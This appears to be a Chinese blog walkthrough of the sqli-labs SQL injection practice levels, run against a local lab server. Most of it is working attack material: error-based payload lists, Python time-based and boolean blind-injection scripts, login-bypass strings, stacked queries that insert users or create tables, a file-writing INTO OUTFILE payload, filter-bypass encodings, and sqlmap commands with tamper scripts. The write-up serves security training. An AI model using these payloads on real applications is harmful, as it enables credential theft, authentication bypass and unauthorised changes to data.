# 重要知识点

# 10 种常见报错函数

'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 
 'and extractvalue(1,concat(0x7e,(select(database()))))-- 
 'or EXP(~(SELECT(*)from(select(database())a))#
 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from information_schema.tables group by x) a)#
 'and GeometryCollection((select * from (select * from(select database())a)b))#
 'and polygon((select * from(select * from(select database())a)b))#
 'and multipoint((select * from(select * from(select database())a)b))#
 'and multilinestring((select * from(select * from(select database())a)b))#
 'and LINESTRING((select * from(select * from(select database())a)b))#
 'and multipolygon((select * from(select * from(select database())a)b))#

# 时间盲注脚本

import requests
from datetime import datetime
import time
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-9/?id='
table_name = ''
print('[+] 开始盲注')
for n in range(1,10):
	for i in strs:
		s = datetime.now()
		payload = "1' and if(ascii(substr(database(),{},1))={},sleep(1.5),1)--+".format(str(n),str(ord(i)))
		#data = {'password':'123',
		#		'username':payload
		#		}
			#requests.post(url,data=data)
		requests.get(url + payload)
		#print(url + payload)
		e = datetime.now()
		if (e-s).seconds >= 1:
			table_name = table_name + str(i)
			print('[*] 成功盲注第{}位,字符为{}'.format(str(n),str(i)))
			break
	time.sleep(0.5)
print('[+] 盲注结束,结果为{}'.format(table_name))

# 布尔盲注脚本

import requests
url = 'http://192.168.183.129:8082/Less-15/'
result = ''
for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = "1')or if(ascii(substr((select(password)from(users)),%d,1))>%d,1,0)#" % (x, mid)
        payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)
        
        data = {
            "uname": payload,
            "passwd":"123",
            "submit":"Submit",
        }
        response = requests.post(url, data = data)
        #print(payload)
        if 'flag' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(int(mid))
    print(result)

# 常用 sql 查询语句

查库
select(database())
查表
select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())
查字段
select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')
查数据
select(group_concat(password))from(users)where(username='secure')
查看数据库
show databases;
查看该数据库的数据表
show tables;
查看该数据表的结构
desc xxx;
查找某个数据表的所有内容
select * from xxx;

# 解题过程

# Less-1

注释符 用 --+

爆出数据库名

?id=11111111 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+
其他报错exp
?id=11111111 'and extractvalue(1,concat(0x7e,(select(database()))))--+

image-20210719121945157

爆出表名

?id=11111111 'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+

image-20210719122023673

爆出字段名

11111111 'and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+

image-20210719122037560

查询 secure 的密码

?id=11111111 'and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

image-20210719122501403

# Less-2

跟 less-1 一样的步骤,不需要引号来闭合,略微有点不同。

?id=11111111 and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+
?id=11111111 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+
11111111 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+
?id=11111111 and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-3

跟 less-1 差不多。猜测后端语句为

select username,password from users where id = ('$id')

同样的操作

?id=11111111') and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+
?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+
?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+
?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-4

双引号 + 括号,闭合语句。--+ 为注释。只验证存在注入就足够了,因为后续的操作都是一样的。

?id=11111111") and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

image-20210719145850158

# Less-5

单引号闭合语句。只验证存在注入就足够了,因为后续的操作都是一样的。

?id=99999999992'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

image-20210719150100808

# Less-6

双引号闭合语句,报错注入

?id=1"and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

image-20210719150229433

# Less-7

写出文件,条件 secure_file_priv 不为 NULL,目录是可写的

111')) union select 1,"<?php phpinfo();?>",2 into outfile "/var/www/html/test/3.txt"--+

image-20210720102710532

虽然提示语法报错,但文件已经写出来了。

image-20210720102641833

# Less-8

布尔盲注 ,时间盲注都可以

布尔盲注脚本如下

import requests
url = 'http://192.168.183.129:8082/Less-8/?id='
result = ''
for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        payload = "1' and ascii(substr((select group_concat(username) from users),%d,1))>%d--+" % (x, mid)
        data = {
            "id":payload
        }
        response = requests.get(url+ payload)
        #print(response.text)
        if 'You are in' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(int(mid))
    print(result)

image-20210719170316263

时间盲注脚本如下

import requests
from datetime import datetime
import time
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-8/?id='
table_name = ''
print('[+] 开始盲注')
for n in range(1,10):
	for i in strs:
		s = datetime.now()
		payload = "1' or if(ascii(substr(database(),{},1))={},sleep(0.3),1)--+".format(str(n),str(ord(i)))
		#data = {'password':'123',
		#		'username':payload
		#		}
			#requests.post(url,data=data)
		requests.get(url + payload)
		e = datetime.now()
		if (e-s).seconds >= 2:
			table_name = table_name + str(i)
			print('[*] 成功盲注第{}位,字符为{}'.format(str(n),str(i)))
			break
	time.sleep(0.5)
print('[+] 盲注结束,结果为{}'.format(table_name))

image-20210719173529999

# Less-9

?id=1' and if (1=1,sleep (1),1)--+ 测试会有延时。

时间盲注脚本

import requests
from datetime import datetime
import time
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-9/?id='
table_name = ''
print('[+] 开始盲注')
for n in range(1,10):
	for i in strs:
		s = datetime.now()
		payload = "1' and if(ascii(substr(database(),{},1))={},sleep(1.5),1)--+".format(str(n),str(ord(i)))
		#data = {'password':'123',
		#		'username':payload
		#		}
			#requests.post(url,data=data)
		requests.get(url + payload)
		#print(url + payload)
		e = datetime.now()
		if (e-s).seconds >= 1:
			table_name = table_name + str(i)
			print('[*] 成功盲注第{}位,字符为{}'.format(str(n),str(i)))
			break
	time.sleep(0.5)
print('[+] 盲注结束,结果为{}'.format(table_name))

image-20210720112718743

# Less-10

脚本基本一样,lee-9 脚本语句里的单引号改成双引号,即可。

import requests
from datetime import datetime
import time
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-10/?id='
table_name = ''
print('[+] 开始盲注')
for n in range(1,10):
	for i in strs:
		s = datetime.now()
		payload = '1" and if(ascii(substr(database(),{},1))={},sleep(1.5),1)--+'.format(str(n),str(ord(i)))
		#data = {'password':'123',
		#		'username':payload
		#		}
			#requests.post(url,data=data)
		requests.get(url + payload)
		#print(url + payload)
		e = datetime.now()
		if (e-s).seconds >= 1:
			table_name = table_name + str(i)
			print('[*] 成功盲注第{}位,字符为{}'.format(str(n),str(i)))
			break
	time.sleep(0.5)
print('[+] 盲注结束,结果为{}'.format(table_name))

image-20210720113357657

# Less-11

在账号框 输入 123‘会报错,并看见 sql 查询语句。

image-20210720114828037

构造万能密码,即可绕过登录。

admin'or 1=1-- 
密码随便输入

image-20210720115020264

联合注入

222'union select database(),3#

image-20210726111307900

# Less-12

构造万能密码,即可绕过登录。

11")or 1=1-- 

123

image-20210720121805698

联合注入

222")union select database(),3#

image-20210720134817205

# Less-13

构造万能密码,即可绕过登录。

admin')or 1=1-- 
123

image-20210720122049833

布尔盲注,爆数据

import requests
url = 'http://192.168.183.129:8082/Less-13/'
result = ''
for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = "1')or if(ascii(substr((select(password)from(users)),%d,1))>%d,1,0)#" % (x, mid)
        payload = "1')or if(ascii(substr((select(database())),%d,1))>%d,1,0)#" % (x, mid)
        
        data = {
            "uname": payload,
            "passwd":"123",
            "submit":"Submit",
        }
        response = requests.post(url, data = data)
        #print(payload)
        if 'flag' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(int(mid))
    print(result)

image-20210720143230575

# Less-14

构造万能密码,即可绕过登录。

admin"or 1=1#
123

image-20210720122440141

布尔盲注

payload = '''1"or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

image-20210720143432433

# Less-15

绕过登录
admin'or 1=1-- 
123



布尔盲注
 payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

# Less-16

能万能密码登录的,都可以布尔盲注,不做代码例子了。

image-20210720151712684

# Less-17

报错注入

 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 
其他方式
 'and extractvalue(1,concat(0x7e,(select(database()))))-- 
 'or EXP(~(SELECT * from(select database())a))#
 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from information_schema.tables group by x) a)#
 'and GeometryCollection((select * from (select * from(select database())a)b))#
 'and polygon((select * from(select * from(select database())a)b))#
 'and multipoint((select * from(select * from(select database())a)b))#
 'and multilinestring((select * from(select * from(select database())a)b))#
 'and LINESTRING((select * from(select * from(select database())a)b))#
 'and multipolygon((select * from(select * from(select database())a)b))#

image-20210720153210849

# Less-18

账号密码输入 admin 123456

header 中 UA 注入

 User-Agent:ing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

image-20210720161131373

# Less-19

header 中 referer 注入

账号密码输入 admin 123456

Referer : ing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

# Less-20

cookie 注入

正常登录后,会提示 cookie 的格式。

image-20210720164906255

构造一下 cookie 即可注入

uname=admin'and extractvalue(1,concat(0x7e,(select(database()))))#

image-20210720165034353

# Less-21

对 cookie 进行 base64 编码,就能注入了。

raw
uname=admin')and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)or ('
base64
uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUKGRhdGFiYXNlKCkpKSwweDdlKSwxKW9yICgn

image-20210721102505661

# Less-22

对 cookie 进行 base64 编码,双引号闭合

raw 
uname=admin"and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)#
base64
uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QoZGF0YWJhc2UoKSkpLDB4N2UpLDEpIw==

image-20210721104142087

# Less-23

题目有过滤 -- 和 # , 只能闭合引号来实现语句的正常运行。

?id=1123'union select 1,database(),3 or '

image-20210721112405016

# Less-24

二次注入

我们的步骤是

1. 注册一个 admin'# 的账号,并登录

image-20210721175525319

修改该帐号的密码,此时修改的就是 admin 的密码,我修改为 123456。

Sql 语句变为 UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='

也就是执行了 UPDATE users SET passwd="New_Pass" WHERE username =' admin'

成功的话跳转页面会提示 Password successfully updated

3. 用刚修改的密码我的是 123456,登陆 admin 管理员账号,就可以成功登陆。

image-20210721180555122

# Less-25

过滤 or 可以双写绕过

联合注入
?id=100'union select 1,database(),3--+

万能密码
?id=100'oorr 1=1--+

# Less-26

绕过空格

(1)双空格
(2)/**/
(3)用括号绕过
(4)用回车代替 //ascii码为chr(13)&chr(10),url编码为%0d  %0a
 (5)%20 %09 %0a %0b %0c %0d %a0 %00  

%09 TAB键(水平)

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键(垂直)

%a0 空格

?id=1111%27uNion%a0sElect(1),(database()),(4)%a0oorr%a0(1)=%271
?id=1111%27uNion%0BsElect(1),(database()),(4)%a0oorr%a0(1)=%271

sqlmap

python sqlmap.py -u http://192.168.183.129:8082/Less-26/?id=1 -proxy=http://127.0.0.1:8080 --tamper doublewords.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 --tech E --dbs

image-20210722102513979

# Less-27

% a0 绕过空格 大小写绕过关键字 or‘1’=‘1 闭合后边

?id=999%27unioN%a0selecT%a01,database(),3%a0or%a0%271%27=%271

sqlmap

python sqlmap.py -u http://192.168.183.129:8082/Less-27/?id=1 -proxy=http://127.0.0.1:8080 --tamper randomcase.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 -tech E --dbs

# Less-27a

双引号闭合

?id=111%22uNion%a0sELect%a01,database(),%223

# Less-28

盲注 payload

?id=1')and(length(database())>7)and('1')=('1
?id=1')and(length(database())>8)and('1')=('1

# Less-28a

联合注入 payload

?id=1111%27)uNion%a0sElect(1),(database()),(4)%a0or%a0(%271%27)=(%271

盲注 payload

?id=1')and(length(database())>7)and('1')=('1
?id=1')and(length(database())>8)and('1')=('1

# Less-29,30,31

都是同一种类型,http 参数污染。

我们在输入数字的时候先给 waf 看然后检测正常后才转发给我们需要访问的页面,那篇文章是有写到的,这里我弄 2 个值,一个是用来欺骗 waf 的。另一个才是给我们需要访问页面的

看一下这篇博客,http://blog.csdn.net/nzjdsds/article/details/77758824

联合注入 payload

?id=1&id=-1' union select 1,2,database()--+

# Less-32

Bypass addslashes()

宽字节注入解析

payload

?id=111%df%27%20union%20select%201,2,database()--+

# Less-33

payload

?id=111%df%27%20union%20select%201,2,database()--+

# Less-34

改为 post 提交,跟 33 一样

uname=111%df%27%20union%20select%201,database()--+&passwd=1&submit=Submit

# Less-35

整数型注入,不出现引号,就绕过了。非要用引号时,拿 16 进制代替绕过

 union select 1,database(),2--+

# Less-36

同 33

?id=111%df%27%20union%20select%201,2,database()--+

# Less-37

同 34

uname=111%df%27%20union%20select%201,database()--+&passwd=1&submit=Submit

# Less-38

堆叠注入详细介绍

?id=1';insert into users(id,username,password)values(20,'zeroc','2021')--+
?id=20

# Less-39

同 38 去掉单引号

?id=1;insert into users(id,username,password)values(20,'zeroc','2021')--+
?id=21

# Less-40

‘)闭合

?id=1');insert into users(id,username,password)values(21,'zeroc','2021')--+
?id=22

# Less-41

?id=1;insert into users(id,username,password)values(22,'zeroc','2021')--+
?id=23

# Less-42

login_user=zeroc&login_password=1231';insert into users(id,username,password)values(29,'zerocd','2021');#&mysubmit=Login

之后登录zerocd  2021 就能进去了,说明存在堆叠注入

# Less-43

’)闭合

login_user=zeroc&login_password=1231');insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-44

’闭合,删除了报错信息

login_user=zeroc&login_password=1231';insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-45

’)闭合

login_user=zeroc&login_password=1231');insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-46

我们可以通过 asc 和 desc 查看返回数据是否相同来简单判断是否存在 order by 注入

?sort=1 desc
?sort=1 asc

根据返回内容,判断确实存在注入

order by 注入有很多种方式进行注入
比如:报错注入、盲注、异或注入。如果达到一定条件还可以联合注入
报错注入很简单:

?sort=1 and updatexml(1,concat(0x7e,(select database())),1)
?sort=1 procedure analyse(extractvalue(rand()*2,concat(0x3a,version())),1)  

延时:

?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

布尔

?sort=rand(ascii(left(database(),1))=115)

# Less-47

引号闭合一下,同 46

?sort=1' and updatexml(1,concat(0x7e,(select database())),1) --+

# Less-48

报错注入无法使用了,可以其他方式。

延时:

?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

布尔

?sort=rand(ascii(left(database(),1))=115)

# Less-49

延时

?sort=1' and (If(ascii(substr(database(),1,1))=115,sleep(5),1))--+

# Less-50

堆叠注入

?sort=1;create table test like users--+

image-20210722150844468

# Less-51

报错注入

?sort=1' and updatexml(1,concat(0x7e,(select database())),1) --+

# Less-52

1;create table test52 like users;%23

# Less-53

1';create table test53 like users;%23

# Less-54

查库

?id=-1%27%20union%20select%201,database(),%27

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='5LODAMXH0G

查数据

?id=-1' union select 1,group_concat(secret_AM6G),3 from 5LODAMXH0G%23

# Less-55

跟 54 一样,单引号改成括号闭合

查库

?id=-1) union select 1,database(),3%23

# Less-56

跟 54 一样,单引号改成单引号 + 括号闭合

查库

?id=-1') union select 1,database(),3%23

# Less-57

跟 54 一样,单引号改成双引号闭合

查库

?id=-1" union select 1,database(),3%23

# Less-58

报错注入

?id=0' and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-59

报错注入同 58,变为数字型注入

?id=0 and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-60

报错注入同 58,单引号闭合 变成 双引号 + 括号闭合

?id=0") and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-61

报错注入同 58,单引号闭合 变成 单引号 + 括号 + 括号闭合

?id=0')) and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-62

payload

?id=1') and ascii(substr((select database()),%d,1))>%d--+

布尔盲注

import requests
url = 'http://192.168.183.129:8082/Less-62/'
result = ''
for x in range(13, 20):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = "1')or if(ascii(substr((select(password)from(users)),%d,1))>%d,1,0)#" % (x, mid)
        payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)
        payload = "?id=1') and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)
        #payload = "?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d--+" % (x, mid)
        
        #payload = "?id=1') and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='E8B6UU2V7P'),%d,1))>%d--+" % (x, mid)
        
        #payload = "?id=1') and ascii(substr((select `secret_DD7F` from `2JYDAB1TK2`),%d,1))>%d--+" % (x, mid)
        
        data = {
            "uname": payload,
            "passwd":"123",
            "submit":"Submit",
        }
        #response = requests.post(url, data = data)
        response = requests.get(url+ payload)
        #print(payload)
        if 'Angelina' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(int(mid))
    print(result)

# Less-63

同 62,闭合方式不一样。payload

?id=1' and ascii(substr((select database()),%d,1))>%d--+

# Less-64

同 62,闭合方式不一样。payload

?id=1)) and ascii(substr((select database()),%d,1))>%d --+

# Less-65

同 62,闭合方式不一样。payload

?id=1" and ascii(substr((select database()),%d,1))>%d and "1"="1
更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝